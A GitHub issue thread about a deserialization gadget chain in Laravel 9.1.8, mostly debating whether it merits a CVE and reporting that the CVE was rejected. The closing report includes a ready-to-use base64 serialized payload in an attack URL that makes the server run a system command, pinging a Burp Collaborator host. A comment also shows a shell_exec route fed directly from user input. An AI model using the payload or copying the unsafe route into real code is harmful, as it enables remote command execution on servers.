-
Notifications
You must be signed in to change notification settings - Fork 5
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Laravel 9.1.8 POP chain #1
Comments
So, why was a CVE issued for this? |
I don't see an attack scenario here. Could you describe in what way this is destructive or gives unintended effects? |
@caendesilva If successfully exploited, an attacker would be able to perform remote code execution. In the example above this is demonstrated by running the A malicious attacker could execute any command. This could be used to spawn a reverse shell, read and write files, access .env credentials, pivot to the database, etc. Successful exploitation would require the use of |
Thank you so much for the explanation. What confused me is that the ping command is entered from within your backend code. Are you claiming that the following string Are you aware of any instances in "official" (as in code maintained by the Laravel org) codebases where this is used? From your reply I know that my codebase does not contain this vulnerability, but if it is present in say Laravel Jetstream, that's something that should be noted. |
The main problem I see is that a POP chain is NEVER a vulnerability by itself. The vulnerability would be to call It's really a nice finding tho. Just doesn't make sense to have it as a CVE, because... it's not a vulnerability. |
That is correct, by using the PoC to generate a base64 payload we can pass that to the example route. I have not personally reviewed all the laravel maintained codebases, but anywhere |
So having code execution on |
The official PHP docs warn of this. This also reflects Taylor Otwell's response when I asked if he was aware of this CVE.
|
@pasterp If you deserialise untrusted data, it's your fault for doing that. If there is whatever POP chain in your code, you may allow an attacker to execute arbitrary code, but the POP chain just makes the vulnerability worse, it DOES NOT constitute the vulnerability. To make an example, if you have a stack buffer overflow, you can exploit it with a ROP chain, but the vulnerability is not the ROP chain, it is the bloody stack buffer overflow. Calling unserialise on untrusted data is a vulnerability. |
I think there should be some serious thought about revoking this CVE. As pointed out, there is no security boundary being breached here. Passing arbitrary data to unserialize has always been classified as "unsafe". That the Laravel core framework just happens to have a few classes that you could readily use in such a scenario does not constitute a vulnerability on their part. Besides, there's no real fix for people using |
No it's not. But it's not necessarily a vulnerability either. If someone were to pass unsafe user input into an If there are any usages in the Laravel core framework that actually has code akin to this, then yeah it should be a CVE. But since it does not seem to be so, this is not any more of a vulnerability in Laravel as the following is: // Obviously DON'T actually do this in a real app
Route::get('/', function (\Illuminate\Http\Request $request) {
echo shell_exec($request->input('name'));
}); While my example above for sure is a vulnerability in my code (if it was actually deployed), it's not a vulnerability within Laravel, or even PHP. |
@caendesilva I'd argue comparing While I agree it's not best practice to pass untrusted user input to |
So just to clarify as we also got the snyk alert. The vulnerability here is that there exists a class in Laravel which will do code execution when called, but that the only route to call it is via unserialize which is not passed untrusted user input in laravel itself. So it isn't reachable unless a user (developer) calls unserialize() on untrusted input which is bad idea anyway (according to the docs and common sense). |
I'm here too because of snyk. Is there any solution to this? |
@oreillysean Check your code for any areas that might use |
@GlitchWitch yes I agree with you. However would this not fix the issue as stated in the CVE oreillysean/framework@57c5f57 I think this is more to do with the __destruct magic method than the unserialize |
this is for Laravel 9.1.8 only ? |
I haven't had a chance to test, but perhaps it would be worth submitting your proposed fix as a PR for the Laravel team to review. |
how to fix this vulnerability ? to upgrade to laravel 9.19 ? |
There isn't a vulnerability to fix here. The researcher has created a controller which unserializes user input and then passes a malicious payload to the controller they have made. PHP official documentation warns you not to unserialise user input for this very reason: https://www.php.net/manual/en/function.unserialize.php This would be a valid CVE if a Laravel library was calling Static code analysis would provide protection against developers crafting such code. The CVE should be revoked. |
Hello, Finally, I decided to contact MITRE about this issue on Monday. Also, I found similar issues: Please help me to gather a list of similar CVEs that are assigned to GCs. I will contact MITRE and inform them. @1nhann Your POP Chains are very good 👍, but they shouldn't have CVE. 🌺 Regards, |
^ best |
That's great, thank you! |
NVD issues CVE or MITRE ? :-/ |
MITRE. |
Hello, It seems a clever person has used the list to contact MITRE and MITRE has revoked all these CVEs (2 hours after my comment) CVE-2021-43503 Good luck, |
@mir-hossein when will they REVOKE this CVE ? |
The CVE for this was marked as rejected. It's already happened. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30778 As for Snyk, you'll have to reach out to them for that answer. In the meantime you should review your code and mark it as ignored if you're not impacted.
|
Hello, Dear @1nhann, When I was investigating POP-related CVEs, I found out almost all of them were requested by our Chinese friends and it has started in 2019. Would you (@1nhann) please tell me if someone provided disinformation about POP chains and misled the security researchers in China? A blog or YouTube video or ...? I'm so sorry about your revoked CVEs. If you remember, three months ago we discussed it here. I didn't contact MITRE at the time because I didn't want to upset you 🌻, but it caused false alarms in companies and CERT centers. We had no way. Was asked MITRE to stop issuing CVEs for POP chains. Your achievements (POP Chains) are very good and valid. 👍🏆 Regards, |
Build a route to test:
routes/web.php
:poc
result :
attack
http://127.0.0.1:1080/?ser=Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MjU6IklsbHVtaW5hdGVcQnVzXERpc3BhdGNoZXIiOjU6e3M6MTI6IgAqAGNvbnRhaW5lciI7TjtzOjExOiIAKgBwaXBlbGluZSI7TjtzOjg6IgAqAHBpcGVzIjthOjA6e31zOjExOiIAKgBoYW5kbGVycyI7YTowOnt9czoxNjoiACoAcXVldWVSZXNvbHZlciI7czo2OiJzeXN0ZW0iO31zOjg6IgAqAGV2ZW50IjtPOjM4OiJJbGx1bWluYXRlXEJyb2FkY2FzdGluZ1xCcm9hZGNhc3RFdmVudCI6MTp7czoxMDoiY29ubmVjdGlvbiI7czo3MDoicGluZyAtbmMgMSBsYXJhdmVsLm1lNDBwOXZ4d2piczdtYXk4czZwdWlwZ2U3a3g4bS5idXJwY29sbGFib3JhdG9yLm5ldCI7fX0=
The text was updated successfully, but these errors were encountered: